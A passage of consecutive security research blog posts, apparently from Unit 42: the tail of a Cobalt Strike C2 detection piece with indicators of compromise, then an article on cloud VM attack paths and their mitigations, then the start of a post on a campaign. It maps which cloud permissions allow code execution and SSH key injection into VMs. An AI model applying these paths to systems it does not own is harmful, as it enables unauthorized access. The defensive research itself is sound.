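              "regex:", regex_rule(uri, user_agent))
```

The exact rule only fires on the unmodified profile. The regular expression covers both samples, but a single further edit to the User-Agent string would defeat it as well.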

Furthermore, attackers do not need to create a Malleable C2 profile from scratch. They can easily copy publicly available examples and modify various values to fit their needs. Our research indicates that attackers use slight modifications of these publicly available profiles for their Cobalt Strike activity in an effort to evade detection.

Conclusion

In the ever-evolving landscape of cybersecurity, attackers persist in finding new methods, like leveraging publicly available Malleable C2 profiles. This strategy enables attackers to initiate Cobalt Strike C2 communications with flexibility, frequently altering profiles to evade detection and sustain malicious activity. Such tactics underscore the dynamic nature of cyberthreats and the continuous need for adaptive and forward-thinking defense mechanisms.

Machine learning-based solutions like ATP are the best type of defensive countermeasure available for preventing highly evasive attacks and C2 like Cobalt Strike. Heuristic detections cannot cover the huge number of permutations that the Malleable C2 framework can so readily provide.

The cost for network security false positives is skewed heavily against the defender, which is a vulnerability in security operations that attackers exploit to their benefit.

Adopting a machine-learning network security platform like ATP provides detection capabilities to counter these types of threats.

This commitment to advancing our technologies in response to these threats reaffirms our dedication to cybersecurity excellence and the safety of the digital community.

Palo Alto Networks Protection and Mitigation

Palo Alto Networks customers are better protected from Cobalt Strike through the following products:

If you think you might have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

SHA256 Hashes for Cobalt Strike Samples:

  • 1980becd2152f4c29dffbb9dc113524a78f8246d3ba57384caf1738142bb3a07
  • b587e215ce8c0b3a1525f136fe38bfdc0232300e1a4f7e651e5dc6e86313e941
  • 38eeb82dbb5285ff6a2122a065cd1f820438b88a02057f4e31a1e1e5339feb2b

Domains and IP Addresses Used for Cobalt Strike C2:

  • msupdate.azurefd[.]net
  • o365updater.azureedge[.]net
  • gupdater.bbtecno[.]com
  • teamsupd.azurewebsites[.]net
  • msdn1357.centralus.cloudapp.azure[.]com
  • cupdater.bbtecno[.]com
  • msupdate.brazilsouth.cloudapp.azure[.]com
  • update37.eastus.cloudapp.azure[.]com
  • update.westus.cloudapp.azure[.]com
  • www.consumershop.lenovo.com.cn.d4e97cc6.cdnhwcggk22[.]com
  • 146.235.52[.]69
  • 159.112.177[.]137


Attack Paths Into VMs in the Cloud

Executive Summary

This post reviews strategies for identifying and mitigating potential attack vectors against virtual machine (VM) services in the cloud. Organizations can use this information to understand the potential risks associated with their VM services and strengthen their defense mechanisms. This research focuses on VM services offered by three major cloud service providers (CSPs): Amazon Web Services (AWS), Azure and Google Cloud Platform (GCP).

VMs are among the most frequently deployed resources in every cloud environment. Their widespread use also makes them a prime target for attackers. Our research shows that 11% of cloud hosts exposed to the internet contain vulnerabilities rated Critical or High severity.

A compromised VM can provide attackers with access to not only the data within the VM instance but also the permissions assigned to it. As compute workloads like VMs are generally ephemeral and immutable, the risk posed by a compromised identity is arguably greater than that of compromised data within a VM.

It is important to note that all the attack paths discussed in this post are intended features with legitimate use cases, such as streamlining the configuration, updating, and monitoring of VMs across hybrid or multi-cloud environments, rather than vulnerabilities. However, if security best practices are not followed, accounts are not protected, and careful attention isn't given to the design of your architecture, malicious users could misuse these services or features. The responsibility of protecting and mitigating these attack paths falls on the cloud users and administrators.

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Prisma Cloud customers are better protected by the attack path policies continuously monitoring and alerting on potential attack paths.
  • Cortex XDR detects and blocks exploits and evasive cloud-based attacks.
  • Cortex Xpanse can detect shadow IT running in public cloud providers and help bring these resources under management.
  • The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.
Related Unit 42 Topics Cloud Cybersecurity Research

Summary of the VM Attack Paths

We explore the conditions and permissions for each attack path into a running VM instance to assist organizations in fine-tuning their detection and mitigation mechanisms. Table 1 provides an overview of all the attack paths we discuss.

| Attack Path | AWS | Azure | GCP |
|---|---|---|---|
| Vulnerability Exploitation | Feasible: Yes; Complexity: Depends | Feasible: Yes; Complexity: Depends | Feasible: Yes; Complexity: Depends |
| Startup Script Manipulation | Feasible: Yes; Feature: EC2 User Data; Complexity: Low | Feasible: Only VM Scale Sets; Feature: VM custom data; Complexity: Low | Feasible: Yes; Feature: Metadata Startup Scripts; Complexity: Low |
| SSH Key Push | Feasible: Yes; Feature: EC2 Instance Connect; Complexity: Low | Feasible: Yes; Feature: VMAccess extension; Complexity: Medium | Feasible: Yes; Feature: Metadata, OSLogin; Complexity: Low |
| Direct Code Execution | Feasible: Yes; Feature: SSM Run Command; Complexity: Medium | Feasible: Yes; Feature: Run Command, Custom Script Extension; Complexity: Low | Feasible: Yes; Feature: VM Manager; Complexity: Medium |
| SSH Over Middleware | Feasible: Yes; Feature: SSM Session Manager; Complexity: Low | Feasible: No | Feasible: No |
| Serial Console Access | Feasible: Yes; Feature: EC2 Serial Console; Complexity: High | Feasible: Yes; Feature: Azure Serial Console; Complexity: High | Feasible: Yes; Feature: Metadata/Serial Console; Complexity: Low |

Table 1. Summary of VM attack paths.

Understanding VMs in the Cloud

VMs are among the oldest and most widely used infrastructure-as-a-service (IaaS) offerings across all cloud service providers. They offer a swift and straightforward method to “lift and shift” on-premises applications to the cloud, maintaining the same user experience at the operating system level and above. Modern VM services support a broad spectrum of operating systems, from Linux to Windows to macOS, enabling virtually any application to be deployed in the cloud.

While VMs might not be the most novel cloud technology today, they continue to host many vital cloud workloads. If a VM is compromised, attackers can not only exfiltrate sensitive data and hijack computational resources but also gain access to all the cloud permissions granted to the VM.

As the tactics, techniques and procedures (TTPs) employed by attackers in the cloud largely depend on the permissions they have managed to obtain, one common method of gaining more permissions is to compromise a compute resource, such as a VM, and hijack its workload identity. As a result, each VM instance can potentially serve as a stepping stone towards an attacker's goal, making it crucial to meticulously manage the VM's attack surface.

We define a VM attack path as a series of steps and conditions that could potentially allow an attacker to log in or execute commands in a VM instance. We assume that attackers possess basic information about the targeted VM, such as its unique identifier (UID), IP address, virtual private cloud (VPC) and region.

This information, which is not typically considered confidential, can be sourced from logs, code, or low-privileged read permissions. However, attackers do not possess the login credentials for VMs. The majority of the attack paths discussed in this post rely on control plane application programming interfaces (APIs) to gain access to a VM.

Subsequent sections each cover a specific technique and explore the related attack paths in each cloud service provider (CSP). We outline the preconditions for each attack path, noting that while these conditions are necessary, they might not be sufficient. For instance, we assume the attackers have already obtained the required permissions through means such as credential leaks or phishing.

We will focus on the most relevant permissions or configurations that result in these attack paths. Although most of the techniques described are not specific to any particular VM operating system, for simplicity, the references and examples provided will primarily be based on Linux systems.
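
One way to reason about these preconditions is to model each attack path as a set of required permissions and check which paths a given set of leaked permissions could satisfy. The sketch below is illustrative only: `ATTACK_PATHS` and `feasible_paths` are hypothetical names, the permission sets are copied from the conditions listed later in this post, and the non-permission conditions (installed agents, enabled features) are deliberately not modeled, so a match indicates a necessary condition rather than a sufficient one.

```python
# Hypothetical model: each attack path maps to the permissions this post lists
# as preconditions. Agent and feature conditions are not modeled here.
ATTACK_PATHS = {
    "AWS startup script (user data)": {
        "ec2:StopInstances",
        "ec2:ModifyInstanceAttribute",
        "ec2:StartInstances",
    },
    "AWS SSH key push (EC2 Instance Connect)": {
        "ec2-instance-connect:SendSSHPublicKey",
    },
    "AWS direct code execution (SSM Run Command)": {"ssm:SendCommand"},
    "Azure direct code execution (Run Command)": {
        "Microsoft.Compute/virtualMachines/runCommands/write",
    },
    "GCP patch job scripts (VM Manager)": {
        "osconfig.patchJobs.exec",
        "osconfig.patchJobs.get",
        "osconfig.patchJobs.list",
    },
}


def feasible_paths(granted):
    """Return the attack paths whose required permissions are all granted."""
    granted = set(granted)
    return sorted(
        name for name, required in ATTACK_PATHS.items() if required <= granted
    )


if __name__ == "__main__":
    leaked = ["ssm:SendCommand", "ec2:StopInstances", "ec2:StartInstances"]
    for path in feasible_paths(leaked):
        print(path)
```

With the sample input, only the SSM Run Command path is reported, because the user data path also requires ec2:ModifyInstanceAttribute.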

Vulnerability Exploitation

Our research reveals that 11% of the cloud hosts exposed to the internet contain Critical or High severity vulnerabilities. Exploiting these vulnerabilities is one of the most common ways attackers gain initial access to cloud environments.

Given that modern applications are bundled with hundreds of dependent packages, the emergence of new vulnerabilities is accelerating faster than ever. Regardless of the instance type and cloud type, if attackers can identify a remotely exploitable vulnerability exposed by a VM, they could potentially compromise and take control of it.

Conditions:

  • The target VM has a vulnerability exposed to the network that can be exploited remotely.
  • The vulnerability allows remote code execution, file access or file overwriting.

Mitigations:

Startup Script Manipulation

A startup script is a file that executes tasks during the initialization process of a VM instance. These scripts are typically used to set up the environment, download dependencies, initialize services and fetch updates. If attackers gain permissions to alter a VM's startup script, they could exploit this feature to inject malicious code into the VMs.

AWS: Modify Startup Scripts in User Data

When launching a new EC2 instance, users can optionally pass parameters or scripts in user data. Any scripts in user data are run when the instance is launched. By default, the scripts are only executed during the first boot of the instance. However, it is possible to configure the cloud-init directives to force scripts to execute at every restart.

Conditions:

  • The Amazon Machine Image (AMI) used to create the EC2 VM must support user data and cloud-init.
  • The principals have the following permissions to alter a VM’s user data and restart the VM:
    • ec2:StopInstances
    • ec2:ModifyInstanceAttribute
    • ec2:StartInstances

Mitigations:

  • Restrict and monitor the use of the ec2:ModifyInstanceAttribute permission.
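
To support this kind of review, the following minimal sketch checks whether an IAM policy document grants all three permissions listed above. It is an approximation under stated assumptions: it only looks at Allow statements and their Action element, treats `*` and `?` as wildcards with case-insensitive matching, and ignores Deny statements, NotAction, Resource and Condition elements. The function name `allows_user_data_rewrite` is hypothetical.

```python
from fnmatch import fnmatchcase

# Permissions this post lists as preconditions for rewriting user data.
REQUIRED_ACTIONS = (
    "ec2:StopInstances",
    "ec2:ModifyInstanceAttribute",
    "ec2:StartInstances",
)


def _as_list(value):
    """Statement and Action may each be a single item or a list."""
    if value is None:
        return []
    return [value] if isinstance(value, (str, dict)) else list(value)


def allows_user_data_rewrite(policy):
    """Return True if the Allow statements cover every required action."""
    patterns = [
        action.lower()
        for statement in _as_list(policy.get("Statement"))
        if statement.get("Effect") == "Allow"
        for action in _as_list(statement.get("Action"))
    ]
    return all(
        any(fnmatchcase(required.lower(), pattern) for pattern in patterns)
        for required in REQUIRED_ACTIONS
    )


if __name__ == "__main__":
    broad = {"Statement": [{"Effect": "Allow", "Action": "ec2:*", "Resource": "*"}]}
    print(allows_user_data_rewrite(broad))
```

Because Deny statements and conditions are ignored, a True result should be read as "worth a closer look" rather than as proof that the principal can perform the attack.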

Azure: Modify Startup Scripts in Custom Data

The startup scripts are stored and passed to an Azure VM via its custom data. For a single VM, its custom data can only be set once at boot time and can’t be updated subsequently. However, custom data of a VM Scale Set, a group of VMs, can be updated.

Newly initiated VMs will receive the updated custom data. Existing VMs, on the other hand, need to be reimaged to receive the new custom data.

Conditions:

  • The principals have the following permission to update the state of a VM scale set and reimage a VM:
    • Microsoft.Compute/virtualMachineScaleSets/write

Mitigations:

  • Restrict and monitor the use of the Microsoft.Compute/virtualMachineScaleSets/write permission.

GCP: Modify Startup Scripts in Metadata

Compute Engine’s metadata service offers a mechanism for storing and retrieving metadata in the form of key-value pairs, including startup/shutdown scripts, SSH keys and numerous feature flags. Metadata can be set at instance-level for each individual VM or project-wide level for all VMs within the project. Each VM is then configured according to its respective metadata.

The startup-script metadata key contains the commands that run when a VM instance boots.

Conditions:

  • The guest agent is installed and activated.
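  • The principals have the following permissions to update a VM’s metadata:
    • compute.instances.setMetadata (via VM’s instance metadata)
    • compute.projects.setCommonInstanceMetadata (via project-wide metadata)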
  • The principals have the following permissions to restart or reboot a VM:
    • compute.instances.stop
    • compute.instances.start
    • compute.instances.reset

Mitigations:

  • Restrict and monitor the use of the compute.instances.setMetadata and compute.projects.setCommonInstanceMetadata permissions.
  • Store startup scripts in cloud storage rather than directly in metadata, and use the startup-script-url metadata key to point to them. This better protects potentially sensitive information in the startup script through change control and additional access controls, and it allows scripts larger than 256 KB.
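
The last recommendation can be checked mechanically. The sketch below audits a VM's metadata for inline startup scripts; it assumes the metadata has already been flattened into a plain key-to-value dictionary (a simplification chosen for this example, not the shape returned by any particular API), and `audit_startup_metadata` is a hypothetical helper name.

```python
MAX_INLINE_BYTES = 256 * 1024  # size limit mentioned in the mitigation above


def audit_startup_metadata(metadata):
    """Return findings for a flattened {key: value} metadata dictionary."""
    findings = []
    script = metadata.get("startup-script")
    if script is not None:
        findings.append("inline startup-script set; consider startup-script-url")
        if len(script.encode("utf-8")) > MAX_INLINE_BYTES:
            findings.append("inline startup-script is larger than 256 KB")
    return findings


if __name__ == "__main__":
    sample = {"startup-script": "#!/bin/bash\napt-get update\n"}
    for finding in audit_startup_metadata(sample):
        print(finding)
```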

SSH Key Push

Given that each organization typically hosts various applications on hundreds (if not thousands) of VM instances in their cloud environments, managing the SSH keys for all these VMs can be a daunting task. To help streamline the process of credential management and access control, most CSPs offer features that allow for the easy insertion of SSH public keys into running VMs.

This process usually involves an agent running within a VM, fetching a public key from a cloud API endpoint, modifying the SSH daemon (sshd) configuration file and overwriting the authorized_keys file on the VM. If attackers gain permissions to push SSH keys, they could exploit this feature to gain unauthorized access to VMs.

AWS: Use EC2 Instance Connect to Push SSH Keys

EC2 Instance Connect provides a simple and secure method to manage SSH access to Linux VMs using identity and access management (IAM). When a user needs to SSH into a VM, Instance Connect pushes a temporary public key to the VM, allowing the user to authenticate with the SSH daemon.

Conditions:

  • The EC2 Instance Connect agent is installed and activated. The VM itself doesn’t require any permissions.
  • The principals have the following permission to push SSH keys:
    • ec2-instance-connect:SendSSHPublicKey

Mitigations:

  • Restrict and monitor the use of the ec2-instance-connect:SendSSHPublicKey permission.
  • Uninstall EC2 Instance Connect if the feature is not needed.
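
Monitoring the permission's use can start from audit log records. The following sketch filters CloudTrail-style records for key pushes made by principals outside an expected set. The field names used here (`eventSource`, `eventName`, `userIdentity.arn`, `requestParameters.instanceId`) are assumptions about the record layout and should be verified against real log samples; `unexpected_key_pushes` and the sample ARNs are hypothetical.

```python
# Assumed event source and name for EC2 Instance Connect key pushes.
EVENT_SOURCE = "ec2-instance-connect.amazonaws.com"
EVENT_NAME = "SendSSHPublicKey"


def unexpected_key_pushes(records, allowed_arns):
    """Return (principal ARN, instance ID) pairs for unapproved key pushes."""
    hits = []
    for record in records:
        if record.get("eventSource") != EVENT_SOURCE:
            continue
        if record.get("eventName") != EVENT_NAME:
            continue
        arn = (record.get("userIdentity") or {}).get("arn", "unknown")
        if arn in allowed_arns:
            continue
        params = record.get("requestParameters") or {}
        hits.append((arn, params.get("instanceId", "unknown")))
    return hits


if __name__ == "__main__":
    sample = [
        {
            "eventSource": EVENT_SOURCE,
            "eventName": EVENT_NAME,
            "userIdentity": {"arn": "arn:aws:iam::111122223333:user/bob"},
            "requestParameters": {"instanceId": "i-0def"},
        }
    ]
    print(unexpected_key_pushes(sample, allowed_arns=set()))
```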

Azure: Use VMAccess Extension to Push SSH Keys

VM Extensions are small applications that facilitate post-deployment configuration and automation on VM instances. These extensions offer functions such as system configuration, system monitoring and system backup.

The VMAccess extension allows the management of administrative users on Linux VMs for tasks like setting a user’s password, pushing an SSH public key or creating a new sudo user. The az vm user command relies on the VMAccess extension to manage user accounts in a VM.

Conditions:

  • The Azure VM agent is installed and activated.
  • The principals have the following permission to install an extension and update user accounts:
    • Microsoft.Compute/virtualMachines/extensions/write
    • Microsoft.Compute/virtualMachines/write

Mitigations:

  • Restrict and monitor the use of the Microsoft.Compute/virtualMachines/extensions/write and Microsoft.Compute/virtualMachines/write permissions.
  • Restrict the type of extension that can be installed on VMs.
  • Remove the VMAccess extension if it is not needed.
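
When reviewing which roles carry these permissions, wildcard grants are easy to miss. The sketch below tests whether a role definition grants a given operation, assuming the role is available as a dictionary with a `permissions` list whose entries hold `actions` and `notActions` arrays, that `*` acts as a wildcard, and that matching is case-insensitive. These are assumptions for illustration, and `role_grants` is a hypothetical helper.

```python
from fnmatch import fnmatchcase


def _matches(operation, patterns):
    """Case-insensitive wildcard match of one operation against patterns."""
    lowered = operation.lower()
    return any(fnmatchcase(lowered, pattern.lower()) for pattern in patterns)


def role_grants(role_definition, operation):
    """Return True if any permission block allows the operation.

    Within a block, an operation is allowed when it matches `actions`
    and does not match `notActions`.
    """
    for block in role_definition.get("permissions", []):
        allowed = _matches(operation, block.get("actions", []))
        excluded = _matches(operation, block.get("notActions", []))
        if allowed and not excluded:
            return True
    return False


if __name__ == "__main__":
    role = {"permissions": [{"actions": ["Microsoft.Compute/virtualMachines/*"]}]}
    print(role_grants(role, "Microsoft.Compute/virtualMachines/extensions/write"))
```

The sample role never names the extensions/write operation explicitly, yet the wildcard still grants it, which is the case this check is meant to surface.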

GCP: Update Metadata to Push SSH Keys

Compute Engine’s metadata service offers a mechanism for storing and retrieving metadata in the form of key-value pairs. By updating the SSH keys metadata key, one can add SSH public keys to a VM instance.

Conditions:

  • The guest agent is installed and activated.
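  • The principals have the following permissions to update a VM’s metadata:
    • compute.instances.setMetadata (via VM’s instance metadata)
    • compute.projects.setCommonInstanceMetadata (via project-wide metadata)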

Mitigations:

  • Restrict and monitor the use of the compute.instances.setMetadata and compute.projects.setCommonInstanceMetadata permissions.
  • Block metadata-based SSH Keys at the project level.

GCP: Use OSLogin to Push SSH Keys

OSLogin automatically manages SSH keys in metadata and user accounts in VM instances using Google Cloud Identity (IAM) policies. This is the recommended way to manage SSH keys in VMs.

OSLogin can be enabled by updating the enable-oslogin metadata key in the metadata service. It is important to note that metadata-based SSH keys and OSLogin are two mutually exclusive features that can’t both be enabled.

Conditions:

  • The OSLogin agent is activated.
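  • The principals have the following permissions to update a VM’s metadata:
    • compute.instances.setMetadata (via VM’s instance metadata)
    • compute.projects.setCommonInstanceMetadata (via project-wide metadata)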
  • The principals are associated with the compute.osLogin role to connect to VMs using OSLogin.
  • The principals, if outside of the organization, have the following permission:
    • compute.oslogin.updateExternalUser

Mitigations:

  • Restrict and monitor the use of the compute.instances.osLogin and compute.oslogin.updateExternalUser permissions.
  • Enforce OS Login with 2FA at the project level.
  • Enforce physical security keys for OS Login at the project level.
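
Because metadata-based SSH keys and OSLogin are mutually exclusive, it can help to compute which mechanism is in effect for a VM. The sketch below does this from flattened project and instance metadata dictionaries. It assumes that an instance-level enable-oslogin value takes precedence over the project-level value and that the string "true" (in any letter case) means enabled; organization-level policies are not modeled. `ssh_key_mechanism` is a hypothetical helper name.

```python
def _flag(metadata, key):
    """Return True/False for a boolean-like metadata value, None if unset."""
    value = metadata.get(key)
    if value is None:
        return None
    return str(value).strip().lower() == "true"


def ssh_key_mechanism(project_metadata, instance_metadata):
    """Return which SSH key mechanism applies to a VM.

    Assumption: the instance-level enable-oslogin value, when present,
    overrides the project-level value.
    """
    enabled = _flag(instance_metadata, "enable-oslogin")
    if enabled is None:
        enabled = _flag(project_metadata, "enable-oslogin")
    return "oslogin" if enabled else "metadata-ssh-keys"


if __name__ == "__main__":
    project = {"enable-oslogin": "TRUE"}
    instance = {"enable-oslogin": "FALSE"}
    print(ssh_key_mechanism(project, instance))
```

Under these assumptions, the sample VM falls back to metadata-based keys even though the project enables OSLogin, which is the kind of per-instance drift a reviewer would want to flag.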

Direct Code Execution

To streamline the management and configuration of a fleet of VM instances, most CSPs offer features that allow the execution of commands or scripts across a set of VMs. This eliminates the need for VMs to have exposed management ports, bastion hosts or even an active sshd running, increasing their security and cost-effectiveness.

These features usually rely on agents running in the VMs that fetch and execute commands from the cloud API endpoints. If attackers gain the necessary permissions to perform these actions, they could exploit these features to execute malicious code within the VMs.

AWS: Use SSM Run Command to Execute Code

The SSM Run Command allows users to execute commands on nodes where the Systems Manager (SSM) agent is installed. The feature offers an easy way to perform one-time configurations or status checks across nodes in single-cloud, multi-cloud or hybrid cloud environments.

Conditions:

  • The SSM agent is installed and activated.
  • The VM has the permissions specified in the AmazonSSMManagedInstanceCore policy.
  • The principals have the following permission:
    • ssm:SendCommand

Mitigations:

  • Restrict and monitor the use of the ssm:SendCommand permission.
  • Restrict the SSM documents that Run Command can execute.
  • Revoke SSM permissions from VMs that are not managed by SSM.
  • Deactivate the Default Host Management Configuration if it is not needed. This feature allows AWS Systems Manager to manage all qualified EC2 instances.
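
To see whether Run Command is being used with documents outside an approved set, audit records can be summarized by document name. This sketch counts SendCommand events whose document is not on an allowlist. It assumes CloudTrail-style records in which `requestParameters.documentName` carries the document name; that field name, the helper `disallowed_documents` and the sample allowlist are assumptions for illustration.

```python
from collections import Counter


def disallowed_documents(records, allowed_documents):
    """Count SendCommand events per document that is not on the allowlist."""
    counts = Counter()
    for record in records:
        if record.get("eventName") != "SendCommand":
            continue
        params = record.get("requestParameters") or {}
        document = params.get("documentName", "unknown")
        if document not in allowed_documents:
            counts[document] += 1
    return dict(counts)


if __name__ == "__main__":
    sample = [
        {"eventName": "SendCommand",
         "requestParameters": {"documentName": "AWS-RunShellScript"}},
        {"eventName": "SendCommand",
         "requestParameters": {"documentName": "AWS-RunPatchBaseline"}},
    ]
    print(disallowed_documents(sample, {"AWS-RunPatchBaseline"}))
```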

Azure: Use Virtual Machine Run Command to Execute Code

The Run Command feature in Azure uses the VM agent within a VM to execute scripts. It can be used for application management, system diagnostics or troubleshooting when RDP or SSH services are unavailable.

Conditions:

  • The Azure VM agent is installed and activated.
  • The principals have the following permission to perform the Run Command:
    • Microsoft.Compute/virtualMachines/runCommands/write

Mitigations:

  • Restrict and monitor the use of the Microsoft.Compute/virtualMachines/runCommands/write permission.

Azure: Use a Custom Script Extension to Run Scripts

VM Extensions are small applications that can perform post-deployment configuration and automation on VM instances. The custom script extension allows for the downloading and execution of scripts within VMs.

Conditions:

  • The Azure VM agent is installed and activated.
  • The principals have the following permissions to install an extension and run the custom script extension:
    • Microsoft.Compute/virtualMachines/extensions/write
    • Microsoft.Compute/virtualMachines/write

Mitigations:

  • Restrict and monitor the use of the Microsoft.Compute/virtualMachines/extensions/write and Microsoft.Compute/virtualMachines/write permissions.
  • Restrict the type of extension that can be installed.

GCP: Use VM Manager to Execute Code

VM Manager is a suite of tools that can help manage a group of VMs. It is primarily used for applying patches, collecting OS information and installing or removing software packages.

Run Pre-Patch or Post-Patch Scripts

The Patch feature can apply OS patches across a set of VM instances using OS package managers like the Advanced Packaging Tool (APT) and Yellowdog Updater, Modified (YUM). During the creation of a patch job, optional pre-patch or post-patch scripts can be executed to either prepare for or test the patch.

Run Scripts in OS Policies

The OS Policy feature allows users to maintain a consistent configuration in OSes across multiple VMs. Each policy file contains the declarative configuration for resources such as packages, repositories or files. One way to configure resources in an OS is to execute scripts.

Conditions:

  • The guest agent is installed and activated.
  • OS Config is enabled in the metadata.
  • The OS Config agent is installed and activated.
  • The VM must have an attached service account, although the service account doesn’t need any permission.
  • The principals need the following permissions to run a patch job:
    • osconfig.patchJobs.exec
    • osconfig.patchJobs.get
    • osconfig.patchJobs.list
  • The principals need the following permissions to manage OS policy assignments:
    • osconfig.osPolicyAssignments.update
    • osconfig.osPolicyAssignments.get
    • osconfig.osPolicyAssignments.list

Mitigations:

  • Restrict and monitor the use of the osconfig.patchJobs.exec and osconfig.osPolicyAssignments.update permissions.
  • Disable the Patch and OS policies feature by setting the osconfig-disabled-features metadata key at the project level.
  • Disable OS Config in the metadata at the project level if it is not needed.
  • Uninstall the OS Config agent if it is not needed.

SSH Over Middleware

AWS: Use SSM Session Manager to Log into a VM

AWS SSM Session Manager provides a secure and auditable way to log into nodes using IAM. Nodes with Session Manager don’t need to have open inbound ports and users logging into the nodes don’t need to manage the private keys.

Session Manager can also be configured on nodes in multi-cloud or hybrid cloud environments. If attackers gain permissions to perform Session Manager actions, they could potentially abuse the feature to log into VMs that are running Session Manager.

Conditions:

  • The SSM agent is installed and activated.
  • The VM’s instance profile has the following permissions:
    • ssmmessages:CreateControlChannel
    • ssmmessages:CreateDataChannel
    • ssmmessages:OpenControlChannel
    • ssmmessages:OpenDataChannel
    • ssm:UpdateInstanceInformation
  • The principals have the following permissions to connect to the VM:
    • ssm:StartSession
    • ssm:ResumeSession
    • ssm:TerminateSession

Mitigations:

  • Restrict and monitor the use of the ssm:StartSession and ssm:ResumeSession permissions.
  • Revoke ssmmessages permissions from VMs that are not managed by Session Manager.
  • Deactivate Default Host Management Configuration if it is not needed.
  • Uninstall the SSM agent if it is not needed.
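
The second mitigation lends itself to a simple inventory check. The sketch below takes a mapping of instance IDs to the actions granted by their instance profiles, plus the set of instances that are intentionally managed through Session Manager, and reports ssmmessages permissions that could be revoked. The input shape and the name `profiles_to_trim` are hypothetical, and a bare `*` grant is not detected by this prefix check.

```python
def profiles_to_trim(instance_actions, managed_instances):
    """Map unmanaged instance IDs to the ssmmessages actions they still hold."""
    flagged = {}
    for instance_id, actions in instance_actions.items():
        if instance_id in managed_instances:
            continue  # Session Manager is expected on this instance
        extra = sorted(
            action for action in actions
            if action.lower().startswith("ssmmessages:")
        )
        if extra:
            flagged[instance_id] = extra
    return flagged


if __name__ == "__main__":
    inventory = {
        "i-1": {"ssmmessages:CreateControlChannel", "s3:GetObject"},
        "i-2": {"ssmmessages:OpenDataChannel"},
    }
    print(profiles_to_trim(inventory, managed_instances={"i-2"}))
```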

Serial Console Access

Most cloud service providers offer serial console access as a feature to troubleshoot boot and network configuration issues in VMs. This feature provides text-based console access to VMs, independent of the network and operating system state.

Because network-based access control does not apply to serial console access, attackers with serial console permissions could potentially abuse this feature to bypass network-based firewall restrictions and gain unauthorized access to VMs. It is important to note that serial console access does not bypass user authentication. Valid passwords or private keys are still needed to log into a VM.

AWS: Login via Serial Ports

Amazon EC2 Serial Console provides access to the serial port of EC2 instances.

Conditions:

  • Serial console access must be enabled at the account level.
    • Principals with the ec2:EnableSerialConsoleAccess permission can enable access.
  • The VM must be one of the supported instance types. Most instances built on the Nitro System are supported.
    • Principals with the ec2:ModifyInstanceAttribute permission can change a VM’s instance type.
  • The principals must have a valid password or permission to push the SSH public key to the instance.
    • The principals with the ec2-instance-connect:SendSerialConsoleSSHPublicKey permission can push the SSH key into a VM via the serial console.

Mitigations:

  • Disable serial console access at the account level.
  • Restrict and monitor the use of ec2:EnableSerialConsoleAccess and ec2-instance-connect:SendSerialConsoleSSHPublicKey permissions.

Azure: Login via Serial Ports

Azure Serial Console provides text-based console access to VM instances.

Conditions:

  • Serial Console is enabled at the subscription level. (It is enabled by default.)
  • The VM’s boot diagnostic is enabled.
  • The VM Guest OS has the terminal management service enabled (e.g., getty in Linux and SAC in Windows). (They are enabled by default.)
  • The VM Guest OS has text-based user authentication configured for local logins (e.g., valid user/password).
  • The principals have the following permissions to connect to a VM via serial port:
    • Microsoft.Compute/virtualMachines/start/action
    • Microsoft.Compute/virtualMachines/read
    • Microsoft.Compute/virtualMachines/write
    • Microsoft.Resources/subscriptions/resourceGroups/read
    • Microsoft.Storage/storageAccounts/listKeys/action
    • Microsoft.Storage/storageAccounts/read
    • Microsoft.SerialConsole/serialPorts/connect/action

Mitigations:

  • Restrict and monitor the use of the Microsoft.SerialConsole/serialPorts/connect/action permission.
  • Disable serial console access at the subscription level.
  • Disable boot diagnostic for individual VMs.
  • Disable terminal management service for individual VMs.
  • Disable text-based authentication for local logins, such as user/password for individual VMs.

GCP: Login via Serial Ports

GCP provides an alternative way to connect to a VM over a serial port. Compute Engine serial port access can be enabled in the metadata service by updating the serial-port-enable metadata key.

Conditions:

  • The guest agent is installed and activated on the VM.
  • The principals have the following permissions to update a VM’s metadata:
    • compute.instances.setMetadata (via VM’s instance metadata)
    • compute.projects.setCommonInstanceMetadata (via project-wide metadata)
    • iam.serviceAccountUser role on the Instance’s service account

Mitigations:

  • Restrict and monitor the use of the compute.instances.setMetadata and compute.projects.setCommonInstanceMetadata permissions.
  • Restrict and monitor the use of the iam.serviceAccountUser role.
  • Disable serial port access through organization policy.
  • Disable the OS Config agent on the VM.

Conclusion

This post provides an overview of potential attack paths into VMs and outlines the mitigation strategies that organizations can implement to enhance their cloud security. Maintaining the security posture of VMs in cloud environments is crucial.

Due to their widespread use and inherent permissions from workload identities, VMs are attractive targets for attackers. All the attack paths discussed throughout this post are based on the intended features of legitimate use cases. However, if these features are not properly secured, adversaries can abuse them with malicious intent. The responsibility of safeguarding these attack paths and mitigating potential risks lies with the cloud users.

IAM configuration plays a pivotal role in both enabling these attack paths and mitigating their associated risks. To ensure robust cloud security, it is vital to continuously identify these attack paths and monitor the use of risky permissions.

As cloud environments continue to evolve, so too will the TTPs employed by cyberattackers. Organizations must remain vigilant and proactive in their cloud security efforts, adapting their strategies to counter evolving threats.

Palo Alto Networks Protection and Mitigation

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Prisma Cloud customers are better protected by the attack path policies that continuously monitor for and alert on potential attack paths.
  • Cortex XDR detects and blocks exploits and evasive cloud-based attacks.
  • Cortex Xpanse can detect shadow IT running in public cloud providers and help bring these resources under management.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.


Operation Diplomatic Specter: An Active Chinese Cyberespionage Campaign Leverages Rare Tool Set to Target Governmental Entities in the Middle East, Africa and Asia

Executive Summary

A Chinese advanced persistent threat (APT) group has been conducting an ongoing campaign, which we call Operation Diplomatic Specter. This campaign has been targeting political entities in the Middle East, Africa and Asia since at least late 2022.

